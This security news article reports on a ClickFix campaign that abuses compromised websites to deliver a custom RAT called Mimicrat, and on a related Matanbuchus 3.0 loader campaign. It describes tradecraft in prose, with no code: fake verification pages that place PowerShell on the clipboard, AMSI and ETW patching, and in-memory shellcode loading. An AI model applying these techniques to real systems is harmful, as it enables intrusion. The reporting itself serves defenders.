Researchers at Elastic Security Labs have uncovered an active ClickFix campaign that leverages compromised legitimate websites to deploy a sophisticated, custom-built remote access trojan (RAT) dubbed ‘Mimicrat.’
Unlike more common ClickFix operations that lead to infostealer infections, the observed campaign deploys a five-stage infection chain installing a native C implant designed for persistence and lateral movement.
According to Elastic, the attackers rely on hijacked trusted websites rather than attacker-controlled infrastructure. The primary entry point is bincheck[.]io, a legitimate Bank Identification Number (BIN) validation service that was compromised to host malicious JavaScript. The injected code dynamically loads an external script that mimics the jQuery library from another compromised site, blending with legitimate web resources.
The remotely loaded script (jq.php) presents victims with a fake Cloudflare verification page that copies a malicious PowerShell command directly to the victim’s clipboard and instructs them to paste it into a Run dialog (Win+R) or PowerShell prompt to “fix” a supposed issue. This clipboard-based execution method allows to bypass browser download protections entirely.
The campaign appears to be opportunistic. It supports 17 languages and dynamically localizes lure content based on browser settings. Observed victims include a US-based university and multiple Chinese-speaking users discussing infections in public forums.
Once executed, the clipboard-delivered command initiates a five-stage attack chain. An obfuscated PowerShell downloader retrieves a second-stage script from command-and-control (C&C) infrastructure. The script disables key Windows telemetry and security protections by patching Event Tracing for Windows (ETW) and the Antimalware Scan Interface (AMSI), then deploys a Lua-based loader. The loader decrypts and runs shellcode entirely in memory, ultimately delivering Mimicrat.
The final payload is a C-based implant. Its configuration (stored in the .data section) contains cryptographic keys, connection parameters, and two complete HTTP communication profiles. All headers and URIs are hex-encoded and decoded at runtime to evade detection.
Mimicrat supports 22 commands, including file and process management, interactive shell access, token impersonation, shellcode injection, and SOCKS5 proxy tunneling.
In a separate report, cybersecurity firm Huntress shared details of a similar ClickFix campaign that delivered Matanbuchus 3.0, a premium malware-as-a-service loader. First advertised in 2021 on Russian-speaking cybercrime forums, it was originally priced at $2,500 per month, however, the newest version 3.0 was completely re-written and now is sold for up to $10,000 per month for the HTTPS version and $15,000 per month for a stealthier DNS-based variant.
Matanbuchus has been used to deploy additional malware such as Cobalt Strike, QakBot, DanaBot, Rhadamanthys stealer, and NetSupport RAT. Huntress assesses with medium confidence that the attacker’s ultimate goal was ransomware deployment or data exfiltration.